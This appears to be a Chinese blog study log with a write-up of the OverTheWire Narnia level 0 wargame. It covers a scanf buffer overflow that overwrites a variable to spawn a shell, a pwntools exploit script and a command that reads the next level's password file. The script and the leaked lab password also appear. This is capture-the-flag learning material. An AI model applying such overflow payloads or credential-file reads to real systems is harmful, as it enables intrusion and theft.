170823 WarGames-Narnia(0)

最新推荐文章于 2020-05-23 22:04:11 发布
原创 最新推荐文章于 2020-05-23 22:04:11 发布 · 433 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一次针对Narnia0服务的缓冲区溢出攻击实验过程,利用程序漏洞修改内存中的值并成功获得shell权限,最终获取下一关密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1625-5 王子昂 总结《2017年8月23日》 【连续第324天总结】
A. Narnia
B.

Level 0

文件在/narnia/中,运行narnia0,提示要将value从0x41414141变为0xdeadbeef
拖下来IDA反编译可知

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int buff; // [sp+18h] [bp-18h]@1
  signed int value; // [sp+2Ch] [bp-4h]@1

  value = 0x41414141;
  puts("Correct val's value from 0x41414141 -> 0xdeadbeef!");
  printf("Here is your chance: ");
  __isoc99_scanf("%24s", &buff);
  printf("buf: %s\n", &buff);
  printf("val: 0x%08x\n", value);
  if ( value != 0xDEADBEEF )
  {
    puts("WAY OFF!!!!");
    exit(1);
  }
  system("/bin/sh");
  return 0;
}

很明显,通过buff的溢出来修改value的值
观察可知buff在sp+18h处,value在sp+2C处
因此构造输入’a’ * (0x2C-0x18) + ‘\xef\xbe\xad\xde’即可

顺便学习了pwntools的使用,它需要linux的环境,因此开了kali虚拟机
OverTheWire都是以SSH方式连接的,因此与直接使用remote不同
conn建立SSH连接后,用run方法开启bash,之后就正常使用了
interactive方法可以将shell交还本地,进行其他动作
不过直接发送cat语句可以更快速地看到结果
pw:

efeidiedae

注释部分为down文件和本地测试的过程

脚本:

#!/usr/bin/python
from pwn import *
# context(arch = 'i386', os = 'linux')
# r = remote('narnia.labs.overthewire.org', 2226)
conn = ssh('narnia0', 'narnia.labs.overthewire.org', 2226, password='narnia0')
# conn.download_file('/narnia/narnia0')
# sh = process('narnia0')
sh = conn.run('sh')
sh.sendline('/narnia/narnia0')
sh.sendline('a' * (0x2c - 0x18) + chr(0xef) + chr(0xbe) + chr(0xad) + chr(0xde))
# sh.interactive()
print(sh.recvrepeat(timeout=5))
sh.sendline('cat /etc/narnia_pass/narnia1')
print(sh.recvrepeat(timeout=5))

C. 明日计划
逆向/NarniaPwn

二进制学习之narnia0
sojrs_sec的博客
09-03 387
学习平台:http://overthewire.org/wargames/narnia/ 密码:narnia0:narnia0 Cd /narnia 一:分析 运行 ./narnia0 从提示看,要我们把val的值从0x41414141 转换成0xdead 执行后会提示我们输入值,我这里输入一堆a,发现buf为24字节的a,val为a的16进制数 而当输入值只有一个a时,val为0x414141...
170825 WarGames-Narnia(1-2)
whklhhhh的博客
08-25 642
1625-5 王子昂 总结《2017年8月25日》 【连续第326天总结】 A. WarGame-Narnia B. Level 1 int __cdecl main(int argc, const char **argv, const char **envp) { char *v3; // ST1C_4@4 if ( !getenv("EGG") ) { put
narnia0
shuimuyq的专栏
02-16 421
/* narnia0.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation;
pwntools初体验
公众号shadow sock7
02-22 2946
Python 2.7.12 (default, Sep 28 2016, 18:41:32) [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.38)] on darwin Type “help”, “copyright”, “credits” or “license” for more information. >>> from pwn
二进制学习之narnia1
sojrs_sec的博客
10-08 278
密码:narnia1:efeidiedae 分析 查看narnia1.c #include <stdio.h> int main(){ int (*ret)(); if(getenv("EGG")==NULL){ printf("Give me something to execute at the env-variable EGG\n"); ...
Chronicles of Narnia Search-crx插件
04-05
语言:English (United States) 搜索《纳尼亚传奇》,获取最新消息! 使用您喜欢的游戏在网络上搜索:纳尼亚传奇! 通过此搜索扩展程序,您可以轻松获得最佳搜索结果,同时在背景中拥有最佳的纳尼亚传奇图片,并且当...
Narnia Wallpaper New Tab Background-crx插件
03-13
这是Narnia Wallpaper New Tab Background的扩展,Nannia Wallpaper New Tab Background使我们的童年时代成为电影 毫无疑问,《纳尼亚传奇》是一部电影,它定义了我们许多人的数百万个童年,就像我们一样。 如果您想...
《黑客秘笈——渗透测试实用指南》读书笔记(1)
ShirlyTL的博客
12-20 6125
渗透学习 1.1搭建测试环境 Linux和 Windows兼备   1.2建立一个域   1.3建立其他服务器 Metasploitable2(一个优秀的 Ubuntu Linux虚拟机) 下载地址:http://sourceforge.net/projects/metasploitable/files/Metasploitable2   OWASPBWA(漏洞网站多) ht
《黑客秘笈——渗透测试实用指南(第2版)》—第1章1.6学习
weixin_34037173的博客
05-02 405
本节书摘来自异步社区《黑客秘笈——渗透测试实用指南(第2版)》一书中的第1章1.6节学习,作者【美】Peter Kim(皮特 基姆),更多章节内容可以访问云栖社区“异步社区”公众号查看。 1.6 学习阅读本书的人员需要初步掌握Nmap、Metasploit、Cain and Abel和aircrack等工具使用原理。您最好对Python/Ruby等高级语...
0x01-逆向-scanf使用不当造成内存控制
0pr
05-23 499
目录 这是什么? 可以学到什么? 数据类型长度 管道 Real User ID 和 Effective User ID 格式化输出 Endianess GDB基础 如何利用这个漏洞? 参考链接 这是什么? 进入逆向的世界。以一个 war game 作为开场,后续不断深入。 这个 war game 是 narnia。链接此处。 Level 0 -> Level 9,难度不断增加。 踏出第一步,Level 0. 根据官网的提示,SSH 连接到服务器。 所有源文件都在 /narnia 目录,并
wargame narnia writeup
weixin_34392843的博客
03-08 323
litao3rd · 2015/04/09 11:02前言这一期的wargame难度明显比之前的leviathan要高,而且已经涉及到相对完善的Linux溢出相关知识了。但是在overthewire上这才居然只是2/10的难度,看来我差得很远啊。在narnia首页,有如下提示,使用初始账号和密码登陆到目标机器,关于本wargame的所有文件都在/narnia文件夹下面。Let's goTo log...
170813 WarGames-Bandit(16-24)
whklhhhh的博客
08-14 1270
1625-5 王子昂 总结《2017年8月13日》 【连续第315天总结】 A. WarGames B. Level 16这次端口未知,只知道范围分布在31000-32000中,并且要分辨出使用SSL的端口 nmap扫描命令可以完成这个任务,-p表示指定端口,-sV表示识别服务bandit16@bandit:~$ nmap -p 31000-32000 localhost -sVStart
WarGames-leviathan(0-7)
whklhhhh的博客
08-14 935
Level 0登录以后发现空空如也,提示也刻意没有 顺手find一下,发现有很多隐藏文件leviathan0@leviathan:~$ find . ./.cache ./.cache/motd.legal-displayed ./.profile ./.bashrc ./.bash_logout ./.backup ./.backup/bookmarks.html前面几个都是初始化/收尾的脚本,
170822 WarGames-Natas(27-28)
whklhhhh的博客
08-22 807
1625-5 王子昂 总结《2017年8月22日》 【连续第323天总结】 A. Natas B.Level 27按照之前sql注入的尿性,username应该是natas28,试一下回复Wrong password确认无误 本来以为是宽字节注入,绕过mysql_real_escape_string()函数 原理是该函数对单引号等字符自动进行转义,在前边添加’\’ 单引号字符为0x27
170815 WarGames-Krypton(0-6)
whklhhhh的博客
08-15 669
1625-5 王子昂 总结《2017年8月15日》 【连续第317天总结】 A. WarGames-Krypton B.Level 0提示为密码被base64加密,直接解密得到password: KRYPTONISGREATLevel 1在文件系统里摸了半天啥都没有,提示文件在/krypton中 于是重新cd /krypton/krypton1 找到README和krypton2文件
170814 WarGames-Bandit25
whklhhhh的博客
08-14 633
1625-5 王子昂 总结《2017年8月14日》 【连续第316天总结】 A. WarGames-Bandit B. Level 25提示为bandit26使用的不是/bin/bash,直接提供了ssh key,很容易登录 但是登录以后显示了一大段东西就退出了 查看/etc/passwd文件,该文件保存了各用户的id、目录和shellbandit26:x:11026:11026:ba
170819 WarGames-Natas(17-20
whklhhhh的博客
08-19 612
1625-5 王子昂 总结《2017年8月19日》 【连续第321天总结】 A. Natas B. Level 17本关的源代码与level15相同,只是把echo语句注释掉了 那么很容易想到,返回值全部被隐藏的时候,使用sql时间盲注 即虽然页面没有显示,但是可以通过sleep()函数的执行与否来反馈 具体构造爆username的shellcode为:SELECT * from u
WarGames-Natas(16)
whklhhhh的博客
08-18 568
natas(16)<? $key = "";if(array_key_exists("needle", $_REQUEST)) { $key = $_REQUEST["needle"]; }if($key != "") { if(preg_match('/[;|&`\'"]/',$key)) { print "Input contains an illegal cha
Narnia-Guardian 2.0:服务器后门清除与PHP文件修复
Narnia-Guardian工具本身包含在一个压缩文件中,文件名为"Narnia-Guardian-master"。用户需要解压这个文件,并在适当的操作系统环境下运行该工具,按照指示进行清理工作。解压后,用户可能需要在命令行或通过图形...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值